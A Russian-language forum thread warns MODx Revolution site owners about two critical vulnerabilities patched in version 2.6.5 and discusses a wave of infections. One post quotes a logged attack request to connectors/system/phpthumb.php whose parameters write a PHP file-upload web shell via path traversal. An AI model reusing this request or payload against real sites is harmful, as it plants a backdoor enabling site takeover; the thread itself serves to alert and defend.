2 Критических уязвимости в MODx Revolution

gregzem
На сайте с 22.11.2004
Offline
134
3803

Если ваш сайт работает на MODx Revolution, рекомендуем срочно обновить его до 2.6.5. Разработчики обнаружили (и уже исправили) в ней две критических уязвимости: первая позволяет одним запросом стереть сайт, вторая - загрузить произвольный файл (в том числе php-скрипт) и удаленно выполнить код (RCE).

https://modx.com/blog/modx-revolution-2.6.5

Данным уязвимостям подвержены все версии, включая 2.6.4.

Антивирус для ISPmanager (https://revisium.com/ru/products/antivirus_for_ispmanager/) | Антивирус для Plesk (https://plesk.revisium.com) | Профессиональное лечение и защита сайтов (https://revisium.com/)
Russ1an
На сайте с 25.03.2015
Offline
60
#1

Уязвимость коснулась только криворуких modx'еров, которые не переименовывают и не закрывают доступ к папке connectors и не переименовывают папку assets(при использовании компонента gallery).

Достойный дом для любимых проектов https://clck.ru/PT7Vo
gregzem
На сайте с 22.11.2004
Offline
134
#2

Ну, таких большинство. Причем, основной удар пришелся на 19-20 число, много сайтов "полегло". И проблема в том, что при заражении содержимое .js файлов заменяется на вредоносный инжект с редиректом на партнерку.

Атака выглядела примерно так:


POST 134.249.50.5 20/07/2018 11:14:05 http://****.com/en//connectors/system/phpthumb.php R: UA: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
post:
pv: ctx = web
pv: cache_filename = ../../dbs.php
pv: useRawIMoutput = 1
pv: src = .
pv: IMresizedData = <?php echo("#0x2515");if(isset($_GET["u"])){echo'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if($_POST['_upl']=="Upload"){if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'Success_Upload!!!';}else{echo'Failed';}};};
pv: config_prefer_imagemagick = 0

Подробности еще можно почитать здесь https://modx.pro/security/15912#cut (в комментариях самое интересное)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий